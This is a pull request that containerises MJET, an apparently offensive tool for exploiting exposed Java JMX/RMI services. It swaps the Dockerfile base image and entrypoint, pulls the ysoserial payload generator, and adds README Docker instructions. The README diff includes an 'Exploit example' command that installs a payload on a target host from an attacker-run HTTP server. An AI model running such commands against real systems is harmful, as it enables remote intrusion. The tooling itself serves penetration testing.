### PR TITLE
Dockerfile improvement and docker docs

### DIFF
--- a/Dockerfile
+++ b/Dockerfile
@@ -7,4 +7,5 @@ RUN wget "http://search.maven.org/remotecontent?filepath=org/python/jython-stand
 	&& wget https://jitpack.io/com/github/frohoff/ysoserial/master-SNAPSHOT/ysoserial-master-SNAPSHOT.jar -O /app/jars/ysoserial.jar
 EXPOSE 8000
 WORKDIR /app
-ENTRYPOINT ["tail", "-f", "/dev/null"]
+ENTRYPOINT ["java", "-jar", "jython-standalone-2.7.0.jar", "mjet.py"]
+CMD ["-h"]

--- a/Dockerfile
+++ b/Dockerfile
@@ -1,7 +1,6 @@
-FROM ubuntu:latest
+FROM openjdk:13-alpine
 ENV TZ=Europe/Stockholm
 RUN ln -snf /usr/share/zoneinfo/$TZ /etc/localtime && echo $TZ > /etc/timezone
-RUN apt-get update && apt-get install -y default-jdk wget git && rm -rf /var/lib/apt/lists/*
 COPY . /app
 RUN wget "http://search.maven.org/remotecontent?filepath=org/python/jython-standalone/2.7.0/jython-standalone-2.7.0.jar" -O app/jython-standalone-2.7.0.jar \
 	&& wget https://jitpack.io/com/github/frohoff/ysoserial/master-SNAPSHOT/ysoserial-master-SNAPSHOT.jar -O /app/jars/ysoserial.jar

--- a/README.md
+++ b/README.md
@@ -423,6 +423,8 @@ docker build -t mjet .
 docker run mjet
 # Exploit example
 docker run mjet 10.165.188.23 2222 install super_secret http://10.165.188.1:8000 8000
+# Run Interactive into shell
+docker run --entrypoint /bin/sh -it mjet
 ```
 
 By default the docker image exposes port 8000 for the HTTP server. If you need another port you need to remember to expose it!

--- a/README.md
+++ b/README.md
@@ -412,6 +412,19 @@ $
 
 Reference: https://www.optiv.com/blog/exploiting-jmx-rmi
 
+### Docker
+
+Build and run the docker image
+
+```bash
+# Build
+docker build -t mjet .
+# Run Help
+docker run mjet
+# Exploit example
+docker run mjet 10.165.188.23 2222 install super_secret http://10.165.188.1:8000 8000
+```
+
 ## Contributing
 
 Feel free to contribute.

--- a/README.md
+++ b/README.md
@@ -425,6 +425,8 @@ docker run mjet
 docker run mjet 10.165.188.23 2222 install super_secret http://10.165.188.1:8000 8000
 ```
 
+By default the docker image exposes port 8000 for the HTTP server. If you need another port you need to remember to expose it!
+
 ## Contributing
 
 Feel free to contribute.


### PR DESCRIPTION
By using the openjdk:13 alpine image we can reduce the image size from ~900mb to ~450mb.

Is there a reason against using jdk 13, if yes we could use `openjdk:11.0-jre-buster`

Changed the entry point and command. If you now run the container you get a help message, and can add commands as you please without manually switching into the shell.
